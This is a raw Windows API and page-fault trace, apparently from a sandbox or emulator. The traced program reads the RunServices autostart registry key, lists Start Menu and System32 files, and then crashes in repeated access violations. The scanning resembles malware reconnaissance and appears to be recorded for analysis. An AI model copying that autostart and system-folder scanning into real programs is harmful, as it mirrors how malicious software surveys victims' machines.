PageFault tbl process 0x00000000 - 0x00000006 entries, 0x00000000-0x00000000. fhandle=0x7200735F.
|offset 0x70012000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x70013000, seek 0x00001000, size 0x00001000, flags=0x00000000
|offset 0x70014000, seek 0x00002000, size 0x00001000, flags=0x00000000
|offset 0x70015000, seek 0x00003000, size 0x00001000, flags=0x00000000
|offset 0x70016000, seek 0x00004000, size 0x00001000, flags=0x00000000
|offset 0x70017000, seek 0x00005000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0004D6B accessing page 0x00070017
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0004D6B accessing page 0x00070016
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0004D6B accessing page 0x00070015
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0004D6B accessing page 0x00070014
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0004D6B accessing page 0x00070013
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0004D6B accessing page 0x00070012
ADVAPI32!RegEnumValueA (0x72007488,0x00000002,0x04FFFD2E,0x04FFFC2A,0x00000000,0x00000000,0x04FFFC2E,0x04FFFC26)
KERNEL32!GetModuleHandleA ("ADVAPI32.DLL")
KERNEL32!GetProcAddress (0x77DC0000,"RegOpenKeyA")
KERNEL32!GetProcAddress (0x77DC0000,"RegEnumValueA")
ADVAPI32!RegOpenKeyA (0x80000002,"Software\Microsoft\Windows\CurrentVersion\RunServices",0x04FFFE2E)
ADVAPI32!RegEnumValueA (0x720074AC,0x00000001,0x04FFFD2E,0x04FFFC2A,0x00000000,0x00000000,0x04FFFC2E,0x04FFFC26)
KERNEL32!FindFirstFileA ("C:\windows\startm~1\programs\*.*",0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!SetCurrentDirectory ("C:\WINDOWS\TEMP\RARSFX0")
KERNEL32!SetCurrentDirectory ("C:\WINDOWS\SYSTEM32")
KERNEL32!FindFirstFileA ("*.*",0x04FFFD04)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003220 accessing page 0x00072009
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
KERNEL32!FindNextFileA (0xFFFF1087,0x04FFFD04)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x77BC2FFA accessing page 0x00077BC3
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x77BC3FFA accessing page 0x00077BC4
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0x77BC4FFA accessing page 0x00077BC5
**EXCEPTION: opcode 0x0000 SEH=0xC0003996 FaultCode=0xC0000005 EFlags=0x00000280
==>cs:eip 0x0028:0x77BC4FFA eax=0x00000001 ebx=0x00010710 ecx=0x00000000 edx=0x00010610 esi=0x00030C00 edi=0xF0001800 esp=0x04FFFFD8 ebp=0x04FFFFF8
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00023F3 accessing page 0x00077BC5
**EXCEPTION: opcode 0x8B43 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00023F3 eax=0x72000598 ebx=0x77BC4FFA ecx=0xC0003996 edx=0x00000008 esi=0x7200726B edi=0x7200719B esp=0x00000030 ebp=0xC3004FB4
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00023F3 ecx=0xC00007D0 edx=0x00000008 esi=0x72007C27 edi=0x00000000 esp=0x00000033 ebp=0xC3004F4C
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x720067F3 edi=0x00000000 esp=0x00000033 ebp=0xC3004EF8
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x720068E3 edi=0x00000000 esp=0x00000033 ebp=0xC3004EA4
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x72009223 edi=0x00000000 esp=0x00000033 ebp=0xC3004E50
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x72009313 edi=0x00000000 esp=0x00000033 ebp=0xC3004DFC
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x72009403 edi=0x00000000 esp=0x00000033 ebp=0xC3004DA8
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x720094F3 edi=0x00000000 esp=0x00000033 ebp=0xC3004D54
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x720095E3 edi=0x00000000 esp=0x00000033 ebp=0xC3004D00
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x720096D3 edi=0x00000000 esp=0x00000033 ebp=0xC3004CAC
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x720097C3 edi=0x00000000 esp=0x00000033 ebp=0xC3004C58
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x720098B3 edi=0x00000000 esp=0x00000033 ebp=0xC3004C04
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x720099A3 edi=0x00000000 esp=0x00000033 ebp=0xC3004BB0
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x72009A93 edi=0x00000000 esp=0x00000033 ebp=0xC3004B5C
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x72009B83 edi=0x00000000 esp=0x00000033 ebp=0xC3004B08
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x72009C73 edi=0x00000000 esp=0x00000033 ebp=0xC3004AB4
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x72009D63 edi=0x00000000 esp=0x00000033 ebp=0xC3004A60
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x72009E53 edi=0x00000000 esp=0x00000033 ebp=0xC3004A0C
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003220 accessing page 0x0007200A
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x72009F43 edi=0x00000000 esp=0x00000033 ebp=0xC30049B8
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A033 edi=0x00000000 esp=0x00000033 ebp=0xC3004964
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A123 edi=0x00000000 esp=0x00000033 ebp=0xC3004910
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A213 edi=0x00000000 esp=0x00000033 ebp=0xC30048BC
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A303 edi=0x00000000 esp=0x00000033 ebp=0xC3004868
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A3F3 edi=0x00000000 esp=0x00000033 ebp=0xC3004814
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A4E3 edi=0x00000000 esp=0x00000033 ebp=0xC30047C0
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A5D3 edi=0x00000000 esp=0x00000033 ebp=0xC300476C
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A6C3 edi=0x00000000 esp=0x00000033 ebp=0xC3004718
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A7B3 edi=0x00000000 esp=0x00000033 ebp=0xC30046C4
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A8A3 edi=0x00000000 esp=0x00000033 ebp=0xC3004670
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200A993 edi=0x00000000 esp=0x00000033 ebp=0xC300461C
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200AA83 edi=0x00000000 esp=0x00000033 ebp=0xC30045C8
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200AB73 edi=0x00000000 esp=0x00000033 ebp=0xC3004574
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200AC63 edi=0x00000000 esp=0x00000033 ebp=0xC3004520
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200AD53 edi=0x00000000 esp=0x00000033 ebp=0xC30044CC
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200AE43 edi=0x00000000 esp=0x00000033 ebp=0xC3004478
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003220 accessing page 0x0007200B
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200AF33 edi=0x00000000 esp=0x00000033 ebp=0xC3004424
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200B023 edi=0x00000000 esp=0x00000033 ebp=0xC30043D0
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200B113 edi=0x00000000 esp=0x00000033 ebp=0xC300437C
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200B203 edi=0x00000000 esp=0x00000033 ebp=0xC3004328
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200B2F3 edi=0x00000000 esp=0x00000033 ebp=0xC30042D4
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200B3E3 edi=0x00000000 esp=0x00000033 ebp=0xC3004280
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200B4D3 edi=0x00000000 esp=0x00000033 ebp=0xC300422C
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200B5C3 edi=0x00000000 esp=0x00000033 ebp=0xC30041D8
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200B6B3 edi=0x00000000 esp=0x00000033 ebp=0xC3004184
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200B7A3 edi=0x00000000 esp=0x00000033 ebp=0xC3004130
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00024AE accessing page 0x000000BC
**EXCEPTION: opcode 0xF366 SEH=0xC0002680 FaultCode=0xC0000005 EFlags=0x00000244
==>cs:eip 0x0028:0xC00024AE eax=0xC0001F20 ebx=0xC00024AE ecx=0xC00007D0 edx=0x00000008 esi=0x7200B893 edi=0x00000000 esp=0x00000033 ebp=0xC30040DC
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0003355 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC0002F18 accessing page 0x000C3003